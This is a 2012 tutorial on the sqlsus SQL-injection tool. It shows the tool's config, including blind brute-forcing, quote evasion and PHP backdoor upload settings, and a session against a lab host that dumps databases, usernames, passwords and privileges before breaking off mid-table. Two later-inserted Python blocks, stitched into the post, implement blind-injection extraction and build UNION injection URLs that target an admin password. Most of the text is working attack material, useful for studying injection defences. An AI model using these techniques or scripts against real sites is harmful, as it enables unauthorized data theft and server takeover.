sqlsus
Posted 2012-10-13 13:49:13

sqlsus only works against MySQL; it is written in Perl.

Installation
  root@Dis9Team:~# apt-get install libwww-perl libdbd-sqlite3-perl libhtml-linkextractor-perl libterm-readline-gnu-perl liblwp-protocol-socks-perl sqlite3
  root@Dis9Team:/pen/sql# wget http://sourceforge.net/projects/sqlsus/files/sqlsus/sqlsus-0.7.2.tgz/download
  root@Dis9Team:/pen/sql# tar xf download
  root@Dis9Team:/pen/sql# cd sqlsus-0.7.2/
  root@Dis9Team:/pen/sql/sqlsus-0.7.2# ./sqlsus -h

                sqlsus version 0.7.2

    Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

  Usage:
      sqlsus [options] [config file]

       Options:
           -h, --help                    brief help message
           -v, --version                 version information
           -e, --execute <commands>      execute commands and exit
           -g, --genconf <filename>      generate configuration file

  root@Dis9Team:/pen/sql/sqlsus-0.7.2#
Generate a configuration file
  root@Dis9Team:/pen/sql/sqlsus-0.7.2# ./sqlsus -g mssql.conf

                sqlsus version 0.7.2

    Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

  [+] Configuration successfully saved to mssql.conf
  root@Dis9Team:/pen/sql/sqlsus-0.7.2# cat mssql.conf
  # Configuration file generated by sqlsus 0.7.2
  package conf; # do not remove this line
  use strict;
  use warnings;

  #
  # Note: only the values that differ from sqlsus defaults are mandatory, so you can have a configuration file with only a few lines in it
  #
  # All these values will be overridden by the variables you have set in sqlsus in a saved session, provided that $allow_override == 1 (which is the default, see below)
  # For example :
  # - first run: you launch sqlsus with no cookie defined.
  # before the second run, you configure a cookie in your configuration file
  # - second run: the cookie is still empty, because the value has been overridden by the one saved
  #
  # In this case, you need to change the value of the cookie inside sqlsus using "set cookie <cookie>"
  # You can always store your running configuration by using "genconf <filename>" inside sqlsus
  #

  ###############################
  ########### GENERAL ###########
  # Start of the url used for the injection
  # In inband/union mode, it is generally a good idea to append "AND 0" so that the real query returns nothing
  # Ex : our $url_start = "http://localhost/script.php?id=1'";
  our $url_start = "";

  # End of the url used for the injection
  # When possible, it is generally a good idea to use "#" here, so that our queries won't be polluted by the original one
  # Ex : our $url_end = "#";
  our $url_end = "";

  # Use POST instead of GET
  our $post = 0;

  # Use blind injection ?
  # set it to 1 for boolean-based blind injection
  # set it to 2 for time-based blind injection (requires MySQL >= 5.0.12)
  our $blind = 0;

  # In boolean-based blind mode, string to be found in the HTML if the statement is true
  our $blind_string = "";

  # In time-based blind mode, how long in seconds (can be a float) to sleep() when the statement is true
  # You must specify a value higher than the maximum delay to be expected in normal conditions
  our $blind_sleep = 2;

  # Allow the values specified in the configuration file to be overridden by the ones you have set in sqlsus (in a saved session)
  our $allow_override = 1;

  # User agent to use for HTTP queries
  our $user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)";

  # Display "debug" messages
  our $debug = 0;

  # Char (not string) to display when something is null / not found
  our $null_substitute = "~";

  # Hex encode strings in the query ?
  # ie: "sqlsus" will be sent as 0x73716c737573, thus escaping quotes filtering
  our $hex_encode_strings = 1;

  # Maximum running processes used to retrieve data (+main process +hits counter process)
  our $processes = 10;

  # Amount of seconds to sleep after each server hit. (can be a float)
  # Note that it does not take the query / answer time in consideration, it's just a simple sleep() after a hit
  our $sleep_after_hit = 0;

  # -- maximum amount of data we can send at once --

  # Typically, we are restricted either by the web server (URL size) or by the layer underneath (PHP / suhosin)
  # Only one of the 2 variables can be set (non 0) at a time, and it will be the only one to be used by sqlsus
  # If both are set to 0, using "start" or "autoconf max_sendable", sqlsus will find which restriction apply, and set the variable(s) accordingly

  # Maximum amount of data we can send at once to the target (+ the size of the URL itself)
  our $max_url_length = 0;

  # Maximum amount of data we can send through the injection point
  our $max_inj_length = 0;

  # ------------------------------------------------

  # Max subqueries per query
  # Note that setting a really big value here (ie: 900), as well as a high value for max_url_length (when using POST for example), may result in a potentially long computation time for the queries to be prepared
  our $max_subqueries = 70;

  # Convert spaces to /**/
  our $convert_spaces = 0;

  # Shall we consider cookies at all ?
  our $use_cookie_jar = 1;

  # Cookie to use, separate name=value pairs with ;
  # This will only have an effect if $use_cookie_jar = 1
  our $cookie = "";

  # Proxy (HTTP / socks)
  # Example for TOR proxying : our $proxy = "socks://localhost:9050";
  our $proxy = "";

  # Credentials
  our $cred_realm = "";
  our $cred_user = "";
  our $cred_password  = "";

  # What HTTP error codes shall we retry on ?
  our @http_error_codes = qw(408 500 501 502 503 504);

  # Maximum number of times to retry per thread/process on a HTTP error code
  our $http_error_retries = 10;

  # Variables to get in %target when using "start"
  our %target_keys = (
          database => 'database()',
          version => 'version()',
          user => 'current_user'
  );

  ###############################
  ############ DATA #############

  # Maximum length before the data returned in the HTML is truncated
  # Only used by "download" for the moment
  our $max_returned_length = 65530;

  # Where to put the data (sessions, files, database(s) dump)
  our $datapath = "/root/.sqlsus";

  # Where to save downloaded files (via the "download" command)
  # such files will be stored in ./$datapath/SERVERNAME/$filespath
  our $filespath = "files";

  # Binary mode (hex encode in mysql, and hex decode in sqlsus)
  # This mode uses twice as much bandwidth as in non binary mode
  # binary mode is useful for :
  # - in blind mode : retrieving non ASCII characters (UTF8 ?) or ones not listed in $default_range (see below)
  # - in general    : retrieving binary content
  our $binary = 0;

  ###############################
  ######### INBAND MODE #########

  # Maximum number of columns to be used in the UNION statement
  # This is used at "start" (or "autoconf select_columns")
  our $max_select_cols = 50;

  # Columns usable for (inband) injection using union
  # example :
  # our @columns = qw(0 0 1 0 1);
  # 5 columns for union, 3rd and 5th can be used to see the result of the query
  # The first "1" will be used as the injection spot
  #
  # Note that actual values will be used (0 or 1) (except the 1 replaced as the injection spot) in the UNION select query, which might not be what you want
  # You can change the entries (but the "1" you want to use) to whatever value suits you
  # Unless this variable is set, sqlsus will auto-detect the suitable number of columns to be used for injection
  our @columns = qw();

  # How to union
  our $union_select = "UNION ALL SELECT BINARY";

  ###############################
  ######### BLIND MODE ##########

  # ASCII chars to brute force if no regex matched
  our $default_range = join (',', (9,10,32..126));

  # Regular expressions to test against each item retrieved on a blind injection
  # and the corresponding ASCII values
  # NOTE:
  # - the values MUST be sorted
  # - the regexes will be tried in order
  our @regex_rlike = (
          # num
          "^[0-9]+\$", join (',',(48..57)),
          # lower alpha
          "^[a-z_. @]+\$", join (',',(32,46,64,95,97..122)),
          # lower hex
          "^[a-f0-9]+\$", join (',',(48..57,97..102)),
          # upper hex
          "^[A-F0-9]+\$", join (',',(48..57,65..70)),
          # upper alpha
          "^[A-Z_. @]+\$", join (',',(32,46,64,65..90,95)),
          # mixed alpha
          "^[A-Za-z_. @]+\$", join (',',(32,46,64,65..90,95,97..122)),
          # alnum
          "^[a-z0-9._@]+\$", join (',',(46,48..57,64,95,97..122)),
          # datetime
          "^[0-9 [.hyphen-minus.]:]+\$", join (',',(32,45,48..57,58)),
          # mixed alnum + stuff
          "^[A-Za-z0-9._@+/ [.hyphen-minus.][.apostrophe.][.quotation-mark.]%]+\$", join (',',(32,34,37,39,43,45,46,47,48..57,64,65..90,95,97..122))
  );

  # Maximum length above which an item won't be bruteforced
  # Set it high enough if you intend to download files
  our $blind_max_length = 4096;


  ###############################
  ########## TAKEOVER ###########

  # Document root, on the web server, of the website we are injecting through
  # This MUST be accurate for sqlsus to be able to upload its backdoor by automatically crawling for candidate directories
  # Also, the web and mysql server must obviously be on the same box
  our $document_root = "/var/www/";

  # List of (relative to document root path) directories to try to upload backdoor to
  # Leave empty for auto detection by crawling the web server
  # ex : our @upload_directories = ("/upload");
  our @upload_directories = ();

  # Maximum depth to look at when crawling the web server for directories
  our $crawler_depth = 5;

  # URL of the uploader script, if already uploaded
  our $uploader = "";

  # What remote filename to use when uploading the tiny uploader
  our $uploader_name = ".u.php";

  # URL of the backdoor, if already uploaded
  our $backdoor = "";

  # What remote filename to use when uploading the backdoor
  our $backdoor_name = ".b.php";


  ###############################
  ########### BRUTE #############

  # Dynamic string to use for column/table names bruteforcing
  # It will be "magically" (perl speaking) incremented and prefixed with $table_prefix when applicable
  our $brute_start_string = "aaa";

  # String to begin the table/column name with
  # ex : our $start_string = "cms_";
  our $table_prefix = "";

  # For each table name, also try an uppercase version for the first char only
  our $uc_first = 1;

  # For each table name, also try an uppercase version (for all chars)
  our $uc_all = 0;

  # Tables dictionary
  our @brute_tables_dict = qw(login logins user users group groups perm permissions perms admin admins administrators staff customer customers client clients config configuration member members name names password passwords);

  # Columns dictionary
  our @brute_columns_dict = qw(id admin login name user username email emailaddress mail e_mail tel phone number telephone address adress street pw pwd pass password);
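The BLIND MODE section above describes the data-retrieval strategy only in its comments: each item is first matched against the @regex_rlike patterns in order, the first match narrows the candidate character set to the listed (sorted) ASCII codes, and $default_range is the fallback. The following added example (my own Python, not sqlsus source) simulates a boolean-based blind extraction against a constructed oracle so the cost of each choice can be counted in hits. It assumes, as the "values MUST be sorted" note suggests, that the sorted range is searched by binary search; the secret, the oracle class and the function names are mine.

```python
import re

# Constructed sample secret (not data from the page): one value a boolean-blind
# injection has to recover, e.g. a password hash read from users.password.
SECRET = "5f4dcc3b5aa765d61d8327deb882cf99"

# First entries of @regex_rlike from the generated config, same order, same
# (pattern, sorted ASCII codes) pairing; DEFAULT_RANGE mirrors $default_range.
REGEX_RLIKE = [
    (r"^[0-9]+$", list(range(48, 58))),                            # num
    (r"^[a-z_. @]+$", [32, 46, 64, 95] + list(range(97, 123))),    # lower alpha
    (r"^[a-f0-9]+$", list(range(48, 58)) + list(range(97, 103))),  # lower hex
    (r"^[A-F0-9]+$", list(range(48, 58)) + list(range(65, 71))),   # upper hex
]
DEFAULT_RANGE = [9, 10] + list(range(32, 127))


class BlindOracle:
    """Stands in for the injected page: every ask() is one HTTP hit whose only
    answer is whether $blind_string showed up (statement true) or not."""

    def __init__(self, secret):
        self._secret = secret
        self.hits = 0

    def ask(self, predicate):
        self.hits += 1
        return bool(predicate(self._secret))


def _binary_search(oracle, candidates, greater_than):
    """Smallest candidate c for which greater_than(secret, c) is false.
    Only correct on a sorted list, which is why the config insists on it."""
    lo, hi = 0, len(candidates) - 1
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle.ask(lambda s, c=candidates[mid]: greater_than(s, c)):
            lo = mid + 1
        else:
            hi = mid
    return candidates[lo]


def extract(oracle, max_length=4096, use_regex=True):
    """Recover one item character by character; returns (value, hits used).
    max_length plays the role of $blind_max_length."""
    # 1. length, as "LENGTH(item) > n" questions
    length = _binary_search(oracle, list(range(max_length + 1)),
                            lambda s, c: len(s) > c)
    # 2. one hit per class: "item RLIKE pattern" until one matches
    charset = DEFAULT_RANGE
    if use_regex and length:
        for pattern, codes in REGEX_RLIKE:
            if oracle.ask(lambda s, p=pattern: re.match(p, s) is not None):
                charset = codes
                break
    # 3. each character, as "ORD(SUBSTRING(item, i, 1)) > code" questions.
    #    A character outside the chosen range (non-ASCII, say) cannot be
    #    recovered this way; that is what $binary = 1 is for.
    value = []
    for i in range(length):
        code = _binary_search(oracle, charset,
                              lambda s, c, i=i: ord(s[i]) > c)
        value.append(chr(code))
    return "".join(value), oracle.hits


if __name__ == "__main__":
    for flag in (True, False):
        value, hits = extract(BlindOracle(SECRET), use_regex=flag)
        print(f"regex narrowing {'on ' if flag else 'off'}: {value!r} in {hits} hits")
```

Run it and compare the two hit counts: a 32-character lower-hex hash costs 4 hits per character once the third regex has matched (16 candidates), against about 7 per character over the 97-character default range, which is the whole point of keeping the regex list ordered from the most specific class to the most general.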


Editing the configuration file

Edit the configuration file, find our $url_start and set it to the injection URL, for example:

  our $url_start = "http://192.168.71.130/pen/news.php?id=1 and 1=2";
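How $url_start, $url_end, $hex_encode_strings, $convert_spaces, @columns, $union_select and $max_url_length combine into the request that is actually sent is not shown on the page. The following added example (my own Python, not sqlsus code) assembles an inband UNION request from those settings the way the config comments describe them, using the URL set above. It also handles the detail a practitioner trips over: a literal "#" in $url_end must be sent as %23, otherwise the HTTP client treats it as a fragment and the MySQL comment never reaches the server. The function names and the exact percent-encoding choices are mine.

```python
import re
from urllib.parse import quote


def hex_encode_strings(sql):
    """Rewrite every single-quoted literal as a MySQL 0x... literal, so the
    payload carries no quote characters ($hex_encode_strings = 1: 'sqlsus'
    becomes 0x73716c737573). An empty literal has no hex form and is kept."""
    def repl(m):
        text = m.group(1)
        return "0x" + text.encode("utf-8").hex() if text else "''"
    return re.sub(r"'([^']*)'", repl, sql)


def union_payload(expr, columns, union_select="UNION ALL SELECT BINARY"):
    """Apply the @columns convention: the first "1" is the injection spot and
    receives `expr`; every other entry is emitted literally, so qw(0 0 1 0 1)
    yields five UNION columns with expr in the third."""
    cols = [str(c) for c in columns]
    spot = cols.index("1")          # ValueError if no column is usable
    cols[spot] = expr
    return f"{union_select} {','.join(cols)}"


def build_url(url_start, payload, url_end="#", *, hex_strings=True,
              convert_spaces=False, max_url_length=0):
    """Assemble $url_start + payload + $url_end into the request URL.
    Only the injected part is percent-encoded; '#' must travel as %23."""
    injected = " " + (hex_encode_strings(payload) if hex_strings else payload) + url_end
    if convert_spaces:              # $convert_spaces = 1
        injected = injected.replace(" ", "/**/")
    url = url_start + quote(injected, safe="/(),=*")
    if max_url_length and len(url) > max_url_length:   # $max_url_length check
        raise ValueError(f"URL is {len(url)} bytes, limit is {max_url_length}")
    return url


if __name__ == "__main__":
    url_start = "http://192.168.71.130/pen/news.php?id=1 and 1=2"
    # the %target probe "start" performs, on a two-column UNION (columns = 0,1)
    print(build_url(url_start, union_payload("database()", ["0", "1"])))
    # a string literal goes out hex-encoded, so quote filtering does not matter
    print(build_url(url_start, union_payload(
        "(SELECT password FROM users WHERE username='admin')", ["0", "1"])))
```

Note that url_start is sent exactly as configured: the "and 1=2" appended to id=1 is what makes the original row disappear so only the UNION result is rendered, which is the same effect the config comment recommends with "AND 0".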
Load the configuration file
  root@Dis9Team:/pen/sql/sqlsus-0.7.2# ./sqlsus mssql.conf

                sqlsus version 0.7.2

    Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

  [+] Session "192.168.71.130" created
  sqlsus>


Test the injection
  sqlsus> start
  [+] UNION columns already set to (0,1), skipping auto-detection... (use "autoconf select_columns" to do it anyway)
  [+] max_url_length already set to 8198 , skipping auto-detection... (use "autoconf max_sendable" to do it anyway)
  [+] Filling %target...
  +----------+-----------------------------+
  | Variable | Value                       |
  +----------+-----------------------------+
  | database | pentest                     |
  | user     | 'root'@'localhost'          |
  | version  | 5.1.61-0ubuntu0.10.10.1-log |
  +----------+-----------------------------+
  3 rows in set

  sqlsus>


The injection works; list the databases
  sqlsus> get databases
  [+] Getting databases names
  +-----------+
  | Databases |
  +-----------+
  | mysql     |
  | pentest   |
  +-----------+
  2 rows in set

  sqlsus>


Setting the database (set with no arguments lists the current session variables)
  sqlsus> set
  database = "pentest"
  columns = 0,1
  binary = 0
  blind_max_length = 4096
  proxy = ""
  cookie = ""
  debug = 0
  max_returned_length = 65530
  max_url_length = 8198
  max_inj_length = 0
  max_subqueries = 70
  processes = 10
  sleep_after_hit = 0
  table_prefix = ""
  http_error_retries = 10
  document_root = "/var/www/"
  crawler_depth = 5
  uploader = ""
  backdoor = ""
  sqlsus>


Changing the default
  sqlsus> set database mysql
  database = "mysql"
  sqlsus> set database
  database = "mysql"


Change it back
  sqlsus> set database pentest
  database = "pentest"


Get the tables
  sqlsus> get tables
  [+] Getting tables names

  <( pentest )>

          [stuff : 2]
                  id
                  summary

          [users : 2]
                  id
                  username
                  password


Get the columns
  sqlsus> get columns users
  [+] Getting columns names for pentest.users
  +------------------+
  | Columns in users |
  +------------------+
  | id               |
  | username         |
  | password         |
  +------------------+
  3 rows in set

  sqlsus>


Get the data
  sqlsus> select * from users
  +------------+----------+----------+
  | id         | username | password |
  +------------+----------+----------+
  | 0000000000 | admin    | admin    |
  | 0000000001 | guest    | guest    |
  +------------+----------+----------+
  2 rows in set (2 hits)

  sqlsus>


Get the privileges
  sqlsus> get privs
  [+] Getting user privileges
  +--------------------+-------------------------+
  | GRANTEE            | PRIVILEGE_TYPE          |
  +--------------------+-------------------------+
  | 'root'@'localhost' | SELECT                  |
  | 'root'@'localhost' | INSERT                  |
  | 'root'@'localhost' | UPDATE                  |
  | 'root'@'localhost' | DELETE                  |
  | 'root'@'localhost' | CREATE                  |
  | 'root'@'localhost' | DROP                    |
  | 'root'@'localhost' | RELOAD                  |
  | 'root'@'localhost' | SHUTDOWN                |
  | 'root'@'localhost' | PROCESS                 |
  | 'root'@'localhost' | FILE                    |
  | 'root'@'localhost' | REFERENCES              |
  | 'root'@'localhost' | INDEX                   |
  | 'root'@'localhost' | ALTER                   |
  | 'root'@'localhost' | SHOW DATABASES          |
  | 'root'@'localhost' | SUPER                   |
  | 'root'@'localhost' | CREATE TEMPORARY TABLES |
  | 'root'@'localhost' | LOCK TABLES             |
  | 'root'@'localhost' | EXECUTE                 |
  | 'root'@'localhost' | REPLICATION SLAVE       |
  | 'root'@'localhost' | REPLICATION CLIENT      |
  | 'root'@'localhost' | CREATE VIEW             |
  | 'root'@'localhost' | SHOW VIEW               |
  | 'root'@'localhost' | CREATE ROUTINE          |
  | 'root'@'localhost' | ALTER ROUTINE           |
  | 'root'@'localhost' | CREATE USER             |
  | 'root'@'localhost' | EVENT                   |
  | 'root'@'localhost' | TRIGGER                 |




